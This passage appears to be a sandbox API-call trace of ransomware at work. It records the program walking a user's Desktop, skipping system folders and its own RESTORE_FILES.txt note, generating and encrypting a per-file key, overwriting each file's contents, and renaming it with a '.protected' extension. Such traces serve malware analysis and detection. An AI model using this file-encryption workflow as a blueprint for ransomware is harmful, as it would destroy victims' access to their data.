pbBuffer=0x295f12c) returned 1 [0091.255] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d81mceAyH3Zi _M-J-W.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d81mceayh3zi _m-j-w.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d81mceAyH3Zi _M-J-W.doc") returned 65 [0091.255] StrStrW (lpFirst="d81mceAyH3Zi _M-J-W.doc", lpSrch=".txt") returned 0x0 [0091.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d81mceAyH3Zi _M-J-W.doc") returned 65 [0091.255] StrStrW (lpFirst="d81mceAyH3Zi _M-J-W.doc", lpSrch=".rar") returned 0x0 [0091.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d81mceAyH3Zi _M-J-W.doc") returned 65 [0091.255] StrStrW (lpFirst="d81mceAyH3Zi _M-J-W.doc", lpSrch=".zip") returned 0x0 [0091.255] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.256] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.256] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.256] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.256] WriteFile (in: 
hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.256] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.256] CloseHandle (hObject=0xb4) returned 1 [0091.256] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d81mceAyH3Zi _M-J-W.doc.protected") returned 75 [0091.256] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d81mceAyH3Zi _M-J-W.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d81mceayh3zi _m-j-w.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d81mceAyH3Zi _M-J-W.doc.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d81mceayh3zi _m-j-w.doc.protected")) returned 1 [0091.257] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.257] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0091.257] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0091.257] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0091.257] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0091.257] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0091.257] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 53 [0091.257] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0091.257] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0091.257] CryptGenRandom 
(in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.258] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.258] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.258] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 53 [0091.258] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0091.258] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 53 [0091.258] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0091.258] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 53 [0091.258] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0091.258] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0091.258] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.259] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0091.259] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.259] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.259] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.259] CloseHandle (hObject=0xb4) returned 1 [0091.259] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.protected") returned 63 [0091.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini.protected")) returned 1 [0091.260] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.260] lstrcmpiW (lpString1="GM EG9P3tcKk_URv7J.odt", lpString2="Windows") returned -1 [0091.260] lstrcmpiW (lpString1="GM EG9P3tcKk_URv7J.odt", lpString2="Program Files") returned -1 [0091.260] lstrcmpiW (lpString1="GM EG9P3tcKk_URv7J.odt", lpString2="Program Files (x86)") returned -1 [0091.260] lstrcmpiW (lpString1="GM EG9P3tcKk_URv7J.odt", lpString2="$Recycle.bin") returned 1 [0091.260] lstrcmpiW (lpString1="GM EG9P3tcKk_URv7J.odt", lpString2="System Volume Information") returned -1 [0091.260] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GM EG9P3tcKk_URv7J.odt") returned 64 [0091.260] StrStrIW (lpFirst="GM EG9P3tcKk_URv7J.odt", lpSrch=".protected") returned 0x0 [0091.260] lstrcmpW (lpString1="GM EG9P3tcKk_URv7J.odt", lpString2="RESTORE_FILES.txt") returned -1 [0091.260] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.260] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GM EG9P3tcKk_URv7J.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gm eg9p3tckk_urv7j.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GM EG9P3tcKk_URv7J.odt") returned 64 [0091.261] StrStrW (lpFirst="GM EG9P3tcKk_URv7J.odt", lpSrch=".txt") returned 0x0 [0091.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GM EG9P3tcKk_URv7J.odt") returned 64 [0091.261] StrStrW (lpFirst="GM EG9P3tcKk_URv7J.odt", lpSrch=".rar") returned 0x0 [0091.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GM EG9P3tcKk_URv7J.odt") returned 64 [0091.261] StrStrW (lpFirst="GM EG9P3tcKk_URv7J.odt", lpSrch=".zip") returned 0x0 [0091.261] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0xb0c, lpOverlapped=0x0) returned 1 [0091.262] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff4f4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.262] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xb0c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0xb0c, lpOverlapped=0x0) returned 1 [0091.262] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) 
returned 1 [0091.262] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.262] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.262] CloseHandle (hObject=0xb4) returned 1 [0091.262] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GM EG9P3tcKk_URv7J.odt.protected") returned 74 [0091.262] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GM EG9P3tcKk_URv7J.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gm eg9p3tckk_urv7j.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GM EG9P3tcKk_URv7J.odt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gm eg9p3tckk_urv7j.odt.protected")) returned 1 [0091.263] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.263] lstrcmpiW (lpString1="heuSjJUSuI3hf.mp4", lpString2="Windows") returned -1 [0091.263] lstrcmpiW (lpString1="heuSjJUSuI3hf.mp4", lpString2="Program Files") returned -1 [0091.263] lstrcmpiW (lpString1="heuSjJUSuI3hf.mp4", lpString2="Program Files (x86)") returned -1 [0091.263] lstrcmpiW (lpString1="heuSjJUSuI3hf.mp4", lpString2="$Recycle.bin") returned 1 [0091.263] lstrcmpiW (lpString1="heuSjJUSuI3hf.mp4", lpString2="System Volume Information") returned -1 [0091.263] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\heuSjJUSuI3hf.mp4") returned 59 [0091.263] StrStrIW (lpFirst="heuSjJUSuI3hf.mp4", lpSrch=".protected") returned 0x0 [0091.263] lstrcmpW 
(lpString1="heuSjJUSuI3hf.mp4", lpString2="RESTORE_FILES.txt") returned -1 [0091.263] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.263] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.263] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\heuSjJUSuI3hf.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\heusjjusui3hf.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.264] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\heuSjJUSuI3hf.mp4") returned 59 [0091.264] StrStrW (lpFirst="heuSjJUSuI3hf.mp4", lpSrch=".txt") returned 0x0 [0091.264] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\heuSjJUSuI3hf.mp4") returned 59 [0091.264] StrStrW (lpFirst="heuSjJUSuI3hf.mp4", lpSrch=".rar") returned 0x0 [0091.264] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\heuSjJUSuI3hf.mp4") returned 59 [0091.264] StrStrW (lpFirst="heuSjJUSuI3hf.mp4", lpSrch=".zip") returned 0x0 [0091.264] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.264] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.265] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.265] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.265] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.265] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.265] CloseHandle (hObject=0xb4) returned 1 [0091.265] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\heuSjJUSuI3hf.mp4.protected") returned 69 [0091.265] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\heuSjJUSuI3hf.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\heusjjusui3hf.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\heuSjJUSuI3hf.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\heusjjusui3hf.mp4.protected")) returned 1 [0091.266] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.266] lstrcmpiW (lpString1="jw19-k.wav", lpString2="Windows") returned -1 [0091.266] lstrcmpiW (lpString1="jw19-k.wav", lpString2="Program Files") returned -1 [0091.266] lstrcmpiW (lpString1="jw19-k.wav", lpString2="Program Files (x86)") returned -1 [0091.266] lstrcmpiW (lpString1="jw19-k.wav", lpString2="$Recycle.bin") returned 1 [0091.266] lstrcmpiW (lpString1="jw19-k.wav", lpString2="System Volume Information") returned -1 [0091.266] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jw19-k.wav") returned 52 [0091.266] StrStrIW (lpFirst="jw19-k.wav", lpSrch=".protected") returned 0x0 [0091.266] lstrcmpW (lpString1="jw19-k.wav", 
lpString2="RESTORE_FILES.txt") returned -1 [0091.266] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.266] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jw19-k.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jw19-k.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.267] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jw19-k.wav") returned 52 [0091.267] StrStrW (lpFirst="jw19-k.wav", lpSrch=".txt") returned 0x0 [0091.267] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jw19-k.wav") returned 52 [0091.267] StrStrW (lpFirst="jw19-k.wav", lpSrch=".rar") returned 0x0 [0091.267] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jw19-k.wav") returned 52 [0091.267] StrStrW (lpFirst="jw19-k.wav", lpSrch=".zip") returned 0x0 [0091.267] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.267] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.267] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.268] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.268] 
WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.268] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.268] CloseHandle (hObject=0xb4) returned 1 [0091.268] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jw19-k.wav.protected") returned 62 [0091.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jw19-k.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jw19-k.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jw19-k.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jw19-k.wav.protected")) returned 1 [0091.269] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.270] lstrcmpiW (lpString1="L2FstIl.mkv", lpString2="Windows") returned -1 [0091.270] lstrcmpiW (lpString1="L2FstIl.mkv", lpString2="Program Files") returned -1 [0091.270] lstrcmpiW (lpString1="L2FstIl.mkv", lpString2="Program Files (x86)") returned -1 [0091.270] lstrcmpiW (lpString1="L2FstIl.mkv", lpString2="$Recycle.bin") returned 1 [0091.270] lstrcmpiW (lpString1="L2FstIl.mkv", lpString2="System Volume Information") returned -1 [0091.270] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L2FstIl.mkv") returned 53 [0091.270] StrStrIW (lpFirst="L2FstIl.mkv", lpSrch=".protected") returned 0x0 [0091.270] lstrcmpW (lpString1="L2FstIl.mkv", lpString2="RESTORE_FILES.txt") returned -1 [0091.270] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c 
| out: pbBuffer=0x295f12c) returned 1 [0091.270] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L2FstIl.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\l2fstil.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L2FstIl.mkv") returned 53 [0091.270] StrStrW (lpFirst="L2FstIl.mkv", lpSrch=".txt") returned 0x0 [0091.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L2FstIl.mkv") returned 53 [0091.270] StrStrW (lpFirst="L2FstIl.mkv", lpSrch=".rar") returned 0x0 [0091.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L2FstIl.mkv") returned 53 [0091.270] StrStrW (lpFirst="L2FstIl.mkv", lpSrch=".zip") returned 0x0 [0091.270] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.271] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.271] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.271] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.271] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, 
lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.271] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.271] CloseHandle (hObject=0xb4) returned 1 [0091.272] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L2FstIl.mkv.protected") returned 63 [0091.272] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L2FstIl.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\l2fstil.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L2FstIl.mkv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\l2fstil.mkv.protected")) returned 1 [0091.273] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.273] lstrcmpiW (lpString1="lUXppUcJoNKpaU.mp3", lpString2="Windows") returned -1 [0091.273] lstrcmpiW (lpString1="lUXppUcJoNKpaU.mp3", lpString2="Program Files") returned -1 [0091.273] lstrcmpiW (lpString1="lUXppUcJoNKpaU.mp3", lpString2="Program Files (x86)") returned -1 [0091.273] lstrcmpiW (lpString1="lUXppUcJoNKpaU.mp3", lpString2="$Recycle.bin") returned 1 [0091.273] lstrcmpiW (lpString1="lUXppUcJoNKpaU.mp3", lpString2="System Volume Information") returned -1 [0091.273] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lUXppUcJoNKpaU.mp3") returned 60 [0091.273] StrStrIW (lpFirst="lUXppUcJoNKpaU.mp3", lpSrch=".protected") 